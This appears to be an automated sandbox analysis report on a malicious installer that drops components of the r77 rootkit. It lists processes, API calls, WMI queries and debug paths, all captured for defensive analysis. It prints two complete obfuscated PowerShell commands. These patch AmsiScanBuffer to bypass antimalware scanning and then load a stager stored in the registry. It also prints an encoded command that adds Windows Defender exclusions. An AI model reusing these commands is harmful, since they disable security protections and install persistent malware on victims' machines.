Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"

Source: C:\Users\user\Desktop\Install.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	1_2_0040352D
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_0000000140001000 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,CreateThread,Sleep,SleepEx,	39_2_0000000140001000
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_000000014000E010 AdjustTokenPrivileges,	39_2_000000014000E010

Source: C:\Users\user\AppData\Roaming\34432.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Install.exe

File created: C:\Users\user\AppData\Local\Temp\nsaDAE.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Install.exe

Code function: 1_2_004021AA CoCreateInstance,

1_2_004021AA

Source: C:\Users\user\Desktop\Install.exe

Code function: 1_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

1_2_0040498A

Source: C:\Users\user\AppData\Roaming\34432.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7020:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Mutant created: \Sessions\1\BaseNamedObjects\9D16FBEF0D8A8F87529DE06A1C43C737
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2280:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6028:120:WilError_01

Source: 34432.exe.1.dr, u200f????????????????????????????????????????.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u000fu2001.cs	Cryptographic APIs: 'CreateDecryptor'
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.AppLaunch.exe.400000.0.unpack, u000fu2001.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\AppData\Roaming\34432.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Install.exe

Static file information: File size 4713759 > 1048576

Source: Install.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: x64\Release\r77-x64.pdb source: svchost.exe
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\Install.pdb source: 34432.exe, 00000004.00000002.371180159.000000001702D000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 00000016.00000000.330232590.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000000.329876550.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\r77-x86.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\InstallService64.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.463366324.000002C8902E9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe
Source:	Binary string: x64.pdb source: svchost.exe
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\InstallService32.pdb source: powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\InstallStager\obj\x64\Release\InstallStager.pdb source: 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356818562.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356782565.0000000003991000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.468321947.000002C8EBC93000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: N\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000002.225232923.0000000000113000.00000004.00000010.00020000.00000000.sdmp, ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000003.224694291.0000000002672000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source:	Binary string: RYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u0003u2001.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.AppLaunch.exe.400000.0.unpack, u0003u2001.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: NewEngineState=Availablefunction Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssem	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssem	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssem	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)	Jump to behavior

Obfuscated command line found

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\34432.exe	Code function: 4_2_00007FFF7E40070C pushad ; ret	4_2_00007FFF7E40070E
Source: C:\Users\user\AppData\Roaming\34432.exe	Code function: 4_2_00007FFF7E4006CE pushad ; ret	4_2_00007FFF7E4006D0
Source: C:\Users\user\AppData\Roaming\34432.exe	Code function: 4_2_00007FFF7E4035CF push cs; iretd	4_2_00007FFF7E4035D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E3F7317 push ebx; iretd	8_2_00007FFF7E3F731A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E3F5097 push eax; iretd	8_2_00007FFF7E3F50A1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E3F44E7 push esp; retf	8_2_00007FFF7E3F44E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E4C5274 pushad ; retf	8_2_00007FFF7E4C5275
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E4C5F76 push ebx; retf	8_2_00007FFF7E4C5F78
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E4C5C3C push esi; retf	8_2_00007FFF7E4C5C3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E4C6156 push ecx; retf	8_2_00007FFF7E4C6158
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_000000014000E228 push rax; retf	22_2_000000014000E229
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_000000014001439D push rcx; retf 003Fh	22_2_000000014001439E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FFF7E3E6450 push ebx; iretd	25_2_00007FFF7E3E645A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FFF7E3E41C7 push esp; retf	25_2_00007FFF7E3E41C8
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 30_2_00007FFF7E3F070C pushad ; ret	30_2_00007FFF7E3F070E
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 30_2_00007FFF7E3F06CE pushad ; ret	30_2_00007FFF7E3F06D0
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 30_2_00007FFF7E3F70FA push ebp; retf	30_2_00007FFF7E3F70FB
